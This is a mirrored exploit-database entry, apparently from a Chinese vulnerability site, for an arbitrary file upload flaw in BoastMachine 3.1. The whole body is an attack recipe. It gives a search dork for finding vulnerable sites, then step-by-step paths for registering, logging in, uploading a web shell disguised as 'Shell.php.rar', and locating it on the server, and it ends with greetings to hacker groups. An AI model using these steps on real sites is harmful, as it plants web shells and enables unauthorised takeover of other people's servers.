BoastMachine 3.1 - Arbitrary File Upload

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059097 漏洞类型
发布时间 2010-01-24 更新时间 2010-01-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11249
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title : boastMachine v3.1 Remote File Upload Vulnerability
Author: alnjm33
Software Link: http://boastology.com/pages/dload.php?id=bmachine-3.1.zip
Software Link2:http://boastology.com/pages/dload.php?id=bmachine-3.1.rar
Version: 3.1
Tested on: Version 3.1
My home : Sec-war.com<http://Sec-war.com>
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
( Powered by boastMachine v3.1 )
================================Exploit=============================================
First join in the Site
/Server/path/register.php
After that
login in the Site
/Server/path/login.php
After Login
go to this link
/Server/path/bmc/files.php?form_id=new
Now upload your shell like ( Shell.php.rar )
Now you can find your shell here
/Server/path/files/username_Shell.php.rar
e.g
http://server/hp_boastMachine/files/alnjm33_aasaa.php.rar
=======================================================================================
Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members